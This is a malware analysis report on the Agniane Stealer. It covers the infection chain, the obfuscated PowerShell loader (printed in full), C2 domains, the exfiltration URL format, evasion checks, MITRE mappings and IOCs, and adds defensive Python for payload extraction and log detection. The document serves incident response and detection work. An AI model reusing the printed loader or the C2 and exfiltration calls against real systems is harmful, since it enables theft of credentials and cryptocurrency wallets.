Agniane Stealer: Information stealer targeting cryptocurrency users


The Agniane Stealer is an information-stealing malware that primarily targets the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have observed a distinct campaign spreading it across our telemetry. Our recent study has led to the successful identification and detailed analysis of a previously unrecognized network URL pattern. Our researchers have recently uncovered more information about the malware's methods for file collection and the intricacies of its command and control (C2) protocol. We also have new reverse engineering insights into the malware's architecture and communication.

We believe our work contributes to the tactical and operational levels of intelligence regarding Agniane Stealer. It may prove useful from incident response to detector development and will be most suitable for a technical audience.

The Agniane Stealer has already been referenced in several articles. "The Agniane stealer malware is being actively marketed and sold via a Telegram channel, accessible at t[.]me/agniane. Potential buyers can make purchases directly through this channel by interacting with a specialised bot, named @agnianebot, which facilitates the transaction process and provides additional information about the malware." Our technical analysis indicates that it uses the ConfuserEx Protector and aims at similar targets. However, it employs a distinct C2 method, based on the sample observed in our telemetry data. Therefore, we have decided to publish a technical analysis of the sample.

Introduction

During our threat-hunting exercises in November 2023, we noticed a pattern of renamed PowerShell binaries, named passbook.bat.exe. On closer inspection of the host machines, we identified infections by the newly discovered malware family Agniane Stealer. Threat researcher Gameel Ali (@MalGamy12) first disclosed the existence of this malware on their X account [1]. Researchers from the Zscaler ThreatLabz Team [2] and Pulsedive Threat Researchers [3] eventually followed up with blog posts of their own. Our work aims to contribute further information to the understanding of campaigns involving the use of Agniane Stealer.

Execution Chain

Execution chain.

The infections we detected appear to start with the download of ZIP files from compromised websites. All of the websites from which we have seen the download of this file in our telemetry are normal websites with legitimate content. All download URLs had the URL pattern below:

http[s]://<domain name>/book_[A-Z0-9]+-\d+.zip

Once downloaded and extracted, the ZIP file drops a BAT file (passbook.bat) and a further ZIP file on the file system. The BAT file contains an obfuscated payload and, after its execution via cmd.exe, it drops an executable which is a renamed copy of the PowerShell binary (passbook.bat.exe). [4]

This renamed PowerShell was used to execute a series of obfuscated commands:

passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\15\Rar$DIa63532.21112\passbook.bat').Split([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) { if ($_CASH_OjmGK.StartsWith(':: @')) { $_CASH_ceCmX = $_CASH_OjmGK.Substring(4); break; }; };$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ceCmX, '_CASH_', '');$_CASH_afghH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is=');for ($i = 0; $i -le $_CASH_afghH.Length - 1; $i++) { $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); };$_CASH_DIacp = New-Object System.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object System.IO.MemoryStream;$_CASH_QbnHO = New-Object System.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null, (, [string[]] ('')))

The command line shown above performs the following actions:

  • Reads the content of the previously extracted BAT file (passbook.bat).
  • Through string matches and replacements, builds the payload dynamically and assigns it to a variable.
  • Converts the payload and the static key from Base64 to byte arrays.
  • XORs the payload using the static key.
  • Decompresses the XORed payload using GZIP.
  • Invokes the payload after reflectively loading it into memory.

To understand the actions taken against the target, we reversed the payload.
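An analyst can recover the embedded assembly without running the loader by replaying the decoding steps above statically. The Python below is an added example, not code from the original report or from the malware: it reads a passbook.bat-style file, drops the "_CASH_" junk tokens, Base64-decodes, XORs with the key and gunzips; the key and the stand-in payload it wraps are constructed for the offline demonstration (for the real sample, the key is the Base64 string hard-coded in the command line above).

```python
import base64
import gzip

def extract_payload(bat_text: str, key_b64: str) -> bytes:
    """Statically replay the loader: take the first line starting with
    ':: @', drop the '_CASH_' junk tokens, Base64-decode, XOR with the
    repeating key, then gunzip. Nothing from the file is executed."""
    marker = None
    for line in bat_text.splitlines():
        if line.startswith(":: @"):
            marker = line[4:]
            break
    if marker is None:
        raise ValueError("no ':: @' payload line found")
    blob = base64.b64decode(marker.replace("_CASH_", ""))
    key = base64.b64decode(key_b64)
    xored = bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))
    return gzip.decompress(xored)

def build_sample_bat(payload: bytes, key_b64: str) -> str:
    """Constructed test input only: wrap a stand-in payload the way the
    loader expects, so the extractor can be exercised offline."""
    key = base64.b64decode(key_b64)
    xored = bytes(b ^ key[i % len(key)]
                  for i, b in enumerate(gzip.compress(payload)))
    b64 = base64.b64encode(xored).decode()
    # insert the '_CASH_' junk token every 8 chars; the loader strips it
    noisy = "_CASH_".join(b64[i:i + 8] for i in range(0, len(b64), 8))
    return "@echo off\r\n:: @" + noisy + "\r\nrem trailer\r\n"

# Constructed key and stand-in payload (not values from the real sample).
SAMPLE_KEY_B64 = base64.b64encode(b"constructed-key-0123").decode()
SAMPLE_PAYLOAD = b"MZ\x90\x00" + b"stand-in for the .NET assembly"

if __name__ == "__main__":
    bat = build_sample_bat(SAMPLE_PAYLOAD, SAMPLE_KEY_B64)
    recovered = extract_payload(bat, SAMPLE_KEY_B64)
    print(recovered == SAMPLE_PAYLOAD, len(recovered))
```

The recovered bytes can then be hashed and handed to a .NET decompiler without the first stage ever executing.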

Binary Analysis

The invoked payload continues with the execution of a C# assembly. We have dumped it into a file, where we get the executable with the hash below:

5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df.

At the time of the analysis, the file was unknown to online sandboxes. We decided to emulate the process on the Cisco Secure Malware Analytics sandbox with the generic settings on this file, which is the second stage of the deployment of the stealer. The dynamic analysis could not be completed because we did not execute the first stage of the malware sample. Therefore, we decided to analyze the sample manually, where we later found that anti-sandbox techniques are used.

The binary file was highly obfuscated with control flow manipulations, like ConfuserEx.

Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.

It is important to note that the sample did not contain a signature for ConfuserEx, but it had an obfuscation method that resembled it.

After reversing the sample, we found it contains another binary file in its resources section, which was being reflectively loaded. The new binary was another C#-based sample, which contained the final payload. It was obfuscated with ConfuserEx with direct signatures.

The C# file calling the Invoke function for in-memory loading and execution, a common approach to reflective loading of resource files.

As you can see from the previous screenshot, it is calling Invoke functions from an EntryPoint object, which contains a parsed resource.

Loading resource data from the malicious sample, which is later executed in memory. The start of the execution is in the image above.

The whole loading process looks as though passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in turn, is running the tmp385C.tmp (tmp385C.tmp is just a header file name) C# program, which reflectively loads the _CASH_78 C# application. The final application in this sequence is the Agniane Stealer:

Malware execution chain. _CASH_78 is the final payload and the actual malware; the multiple stages before it are used only for delivery, obfuscation or detection evasion.

Command and Control

The Agniane Stealer operates in a simple yet efficient manner, stealing credentials and files from the endpoint using a basic C2 protocol. First, it verifies the availability of its domain names via a simple C# web request, checking whether the return value is "13". This test request is made to a URL labelled "test", for example:

WebClient wc = new WebClient();
urlData = wc.DownloadString("https://trecube[.]com/test");
if (urlData == "13") {
    list_of_active_c2.Add("trecube[.]com");
    continue;
}

In our sample, we can see the following IOCs (indicators of compromise) present in the resources file:

trecube[.]com
trecube13[.]ru
imitato23[.]store
wood100home[.]ru

For all of these domains, the sample requests the test URL.

Later, the malware calls the C2 to get a list of file extensions to look for. This is located at the URL pattern getext?id= followed by an ID, which is part of the resources of the _CASH_78 file. On this site, the list of extensions is separated by semicolons, and for example on the site trecube[.]store it looks like:

*.txt; *.doc; *.docx; *.wallet; *seed*

Again, this is handled like the earlier check string in the code. It is parsed/split by semicolon and a list of extensions is created in a list of variables in the C# code.

The code handling seen via dynamic analysis, in which we identified the C2 URL by setting a breakpoint on DownloadString.

Next, the malware requests a remote JSON file containing details about errors, VirusTotal hits, etc. Based on this information, the sample either progresses or halts. We chose to focus our investigation on other aspects that are more directly related to attribution and detection settings. However, it is important to note that the URL pattern can be used for tracking the malware via telemetry or online sandbox services for OSINT purposes. The URL looks like:

hxxps://trecube13[.]ru/getjson?id=67

And here is what its corresponding output looks like:

{
    "debug": "0",
    "emulate": "0",
    "virtualbox": "1",
    "virustotal": "0",
    "error": "0",
    "errorname": "NONE",
    "errortext": "NONE",
    "competitor": "0"
}

The next stage involves enumeration and collection. It scans the computer to collect all documents with the extensions specified by the URL with the "getext" pattern, along with other credentials found in common paths of the operating system, such as Mozilla Firefox storage, Chrome storage and saved Windows credentials. This is a common process among information stealer malware. Additionally, Agniane checks the localization settings of the victim computer. If it contains any of the language packages below, it does not proceed with the infection:

ru-RU
kk-KZ
ro-MD
uz-UZ
be-BY
az-Latn-AZ
hy-AM
ky-KG
tg-Cyrl-TJ

The allowlisting of some regions can also mean the developer does not want to attack specific regions. Based on other observations it is possible to expect that the attacker is from a country with strong diplomatic ties to Russia.

Once all the target files are collected, the malware creates a ZIP archive under the "local application data" folder:

C:\Users\[user]\AppData\Local\[A-Z0-9]{32}

Below is the structure/content of this archive file:

Agniane Stealer.txt   // added as attachment here
Installed Apps.txt    // added as attachment here
PC Data.txt           // added as attachment here
Files from Desktop    // FOLDER: contains exfiltrated files from the Desktop folder
Files from ...        // FOLDER: contains exfiltrated files from ...
...                   // and other folders, which contain exfiltrated files

It is later uploaded to:

https://trecube[.]com/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0

Below you can find the illustrated version of the Agniane Stealer's C2 communication:

The C2 communication protocol.
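As a detection aid, the stage-one download pattern and the C2 endpoint shapes described above (test, getext, getjson, gate) can be matched against web proxy logs. The Python below is an added example, not code from the original report: the IOC domains are the ones listed above with defanging removed, while the log lines, client addresses and every ".invalid" hostname are constructed placeholders.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# C2 domains from the IOC list above, with the [.] defanging removed.
C2_DOMAINS = {"trecube.com", "trecube.store", "trecube13.ru",
              "imitato23.store", "wood100home.ru"}
# Stage-one ZIP download path shape; the host is any compromised site.
STAGE1_ZIP = re.compile(r"/book_[A-Z0-9]+-\d+\.zip$")

def classify_url(url: str) -> Optional[str]:
    """Label a URL whose shape matches Agniane delivery or C2 traffic."""
    p = urlparse(url)
    host = p.hostname or ""
    q = parse_qs(p.query)
    if host in C2_DOMAINS:
        return "agniane-c2-domain"
    if STAGE1_ZIP.search(p.path):
        return "agniane-stage1-download"
    if p.path in ("/getext", "/getjson") and "id" in q:
        return "agniane-c2-" + p.path[1:]
    # the gate upload carries build=BAT and an AGNIANE- prefixed token
    if p.path == "/gate" and (q.get("build") == ["BAT"] or any(
            t.startswith("AGNIANE-") for t in q.get("token", []))):
        return "agniane-c2-exfil"
    return None

def scan_proxy_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client, url, label) for 'time client method url status' lines."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        label = classify_url(parts[3])
        if label:
            hits.append((parts[1], parts[3], label))
    return hits

# Constructed sample log; .invalid hostnames are placeholders.
SAMPLE_LOG = [
    "2023-11-02T10:01:04Z 10.0.0.12 GET https://compromised-site.invalid/files/book_A7Q2K9-2023.zip 200",
    "2023-11-02T10:01:05Z 10.0.0.12 GET https://compromised-site.invalid/index.html 200",
    "2023-11-02T10:02:11Z 10.0.0.12 GET https://unknown-host.invalid/getext?id=67 200",
    "2023-11-02T10:02:13Z 10.0.0.12 GET https://unknown-host.invalid/getjson?id=67 200",
    "2023-11-02T10:03:40Z 10.0.0.12 POST https://unknown-host.invalid/gate?id=67&build=BAT&token=AGNIANE-0000 200",
    "2023-11-02T10:04:00Z 10.0.0.7 GET https://other-site.invalid/gate?id=1 200",
]
```

scan_proxy_log(SAMPLE_LOG) returns four hits for client 10.0.0.12 (the stage-one ZIP, the getext and getjson polls and the gate upload); the unrelated /gate?id=1 request lacks the build tag and token and is not flagged.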

Other TTPs

The Agniane Stealer was also seen performing the following actions:

  • Enumerating the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall for installed programs; it also collects this information.
  • Checking for a public IP on ip-api.com, i.e.,
    https://ip-api.com/json/?fields=11827
  • Dumping Bitcoin and other cryptocurrency wallets.
  • Performing (not well) checks to see if it is running in a debugged or virtual environment, etc.
  • Collecting wallet.dat files.
  • Enumerating Profile and User data.
  • Collecting stored credit cards.
  • Adding other malware like NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).

Conclusion

The Agniane Stealer tries to stay undetected through various obfuscation and anti-VM/debug techniques. It exhibits common behaviour for stealers, such as collecting and exfiltrating files, credentials and passwords, credit card details, wallets, etc. Its evasive nature and targeting of a variety of information may attract more adversaries in the future to leverage its services.

Kill Chain

Kill Chain            | Activity                                                            | TTP
Weaponization         | Use of PowerShell, ZIP file, batch file                             | T1059.005, T1059.001
Delivery              | ZIP file downloaded via the browser                                 | T1204.002
Delivery              | Use of compromised websites                                         | T1584.004
Exploitation          | Running obfuscated PowerShell payload                               | T1059.001, T1027.010
Exploitation          | PowerShell decrypts payload using XOR and decompresses using Gunzip | T1140, T1059.001
Exploitation          | Reflective loading of the payload via PowerShell                    | T1059.001, T1204.002, T1620
Exploitation          | Use of renamed PowerShell                                           | T1036.003
Installation          |                                                                     |
Command and Control   |                                                                     |
Actions on Objectives | Collection of various information from the host                     | T1119
Actions on Objectives | Targeting of credentials                                            | T1555

Indicators of Compromise

Type      | Stage    | IOC (indicator of compromise)
File Hash | Delivery | 5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df
File Hash | Delivery | e59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574
File Hash | Delivery | b2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87
Domain    | C2       | trecube[.]com
Domain    | C2       | trecube[.]store
Domain    | C2       | trecube13[.]ru
Domain    | C2       | imitato23[.]store
Domain    | C2       | wood100home[.]ru

References

[1] https://twitter.com/MalGamy12/status/1688984207752663040?t=xECvfQF8pujQERAmhfI41w
[2] https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-web-s-crypto-threat
[3] https://blog.pulsedive.com/analyzing-agniane-stealer/
[4] https://www.pcrisk.com/removal-guides/27510-agniane-stealer

